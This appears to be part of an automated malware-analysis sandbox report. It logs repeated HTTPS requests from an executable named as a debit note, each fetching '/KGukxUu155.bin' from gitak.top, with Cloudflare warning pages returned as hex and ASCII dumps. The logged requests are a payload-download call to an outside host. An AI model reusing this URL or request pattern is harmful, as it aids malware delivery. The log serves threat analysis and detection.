2024-08-26 13:39:14 UTC	539	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:39:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z2Syq5B2CuWDpoA0Pi1WssnO0604T5gXrvuhXAlQ4g%2BYwVejucXLTK1FzYjgdi6RK%2BmpK0G9LAQcHMzc4Pqv6dzDTfuOpt2NVd8QIVWdaC2wZ1Cg3X%2BG2ZoeqrY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b943a0fbb90818c-IAD
2024-08-26 13:39:14 UTC	830	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:39:14 UTC	1369	IN	Data Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:39:14 UTC	1369	IN	Data Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 69 53 76 59 6e 7a 65 6f 33 6a 6e 65 55 47 4b 64 32 39 59 43 4f 69 4e 36 47 62 33 36 6b 61 47 51 42 79 44 4e 33 75 70 44 34 73 67 2d 31 37 32 34 36 37 39 35 35 34 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 Data Ascii: <input type="hidden" name="atok" value="iSvYnzeo3jneUGKd29YCOiN6Gb36kaGQByDN3upD4sg-1724679554-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
2024-08-26 13:39:14 UTC	850	IN	Data Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f Data Ascii: sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
2024-08-26 13:39:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.11.20	49858	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:39:24 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:39:25 UTC	533	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:39:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1yxJJHNLb1dEeAaVmSV1w1c0rZS5T54lQdMLUlWehcXHYDGfNdI2a4TUMUhn9SiwQfTXbcyAsJXknWIYkiQiWSmyEFfCwUomA99kRMVyv4jclaDqJjaesAzpSBs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b943a5158288256-IAD
2024-08-26 13:39:25 UTC	836	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:39:25 UTC	1369	IN	Data Raw: 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20 20 20 20 20 Data Ascii: /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:39:25 UTC	1369	IN	Data Raw: 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 58 45 64 7a 2e 70 78 66 4a 46 61 34 7a 35 75 50 73 59 62 39 41 42 46 50 66 65 75 4e 4e 44 71 30 69 37 33 32 72 30 7a 77 63 37 55 2d 31 37 32 34 36 37 39 35 36 35 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 Data Ascii: type="hidden" name="atok" value="XEdz.pxfJFa4z5uPsYb9ABFPfeuNNDq0i732r0zwc7U-1724679565-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="ba
2024-08-26 13:39:25 UTC	844	IN	Data Raw: 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f 73 70 Data Ascii: den">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></sp
2024-08-26 13:39:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.11.20	49859	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:39:35 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:39:35 UTC	551	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:39:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Myj6Qf9ZltXdR8Yw5Z2DS%2BFPM%2F7Q%2FFt8z5MSVDMh0Fg1VjvN9nX%2FyE4Soopo3oQrA%2BfpC%2F9xFnCp9%2F3yl6JJ4Nu7zX0hrrq%2BDO7S%2BJ3KJQ68dU8fFvLVZXf2qVg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b943a92ff188f23-IAD
2024-08-26 13:39:35 UTC	818	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:39:35 UTC	1369	IN	Data Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
2024-08-26 13:39:35 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 77 42 67 6a 73 6b 6f 39 4b 44 62 54 78 4d 5f 49 43 66 76 46 51 2e 2e 64 73 36 55 52 39 33 49 4c 6f 6d 44 37 4e 76 68 79 45 44 38 2d 31 37 32 34 36 37 39 35 37 35 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d Data Ascii: <input type="hidden" name="atok" value="wBgjsko9KDbTxM_ICfvFQ..ds6UR93ILomD7NvhyED8-1724679575-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class=
2024-08-26 13:39:35 UTC	862	IN	Data Raw: 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e Data Ascii: r-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">
2024-08-26 13:39:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.11.20	49860	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:39:45 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:39:46 UTC	539	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:39:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QSnSEpx0SqVu8SFCMqBfdALbbyGDE8%2BMDbmAbQKs0zy4xMWFe25qTXHC5sfYUE76EgjdRCuavJGKsntZNsUOCv39sZKoXnPDiOHLLUZH%2B%2FQMg1VGXnyh98MkRQM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b943ad47e99c580-IAD
2024-08-26 13:39:46 UTC	830	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:39:46 UTC	1369	IN	Data Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:39:46 UTC	1369	IN	Data Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 77 49 58 58 74 35 33 4f 6f 6d 51 31 59 4a 70 42 33 72 36 33 34 32 76 53 63 45 70 5f 4f 37 2e 47 36 4d 4d 6a 4d 77 34 47 62 7a 49 2d 31 37 32 34 36 37 39 35 38 35 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 Data Ascii: <input type="hidden" name="atok" value="wIXXt53OomQ1YJpB3r6342vScEp_O7.G6MMjMw4GbzI-1724679585-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
2024-08-26 13:39:46 UTC	850	IN	Data Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f Data Ascii: sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
2024-08-26 13:39:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.11.20	49861	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:39:56 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
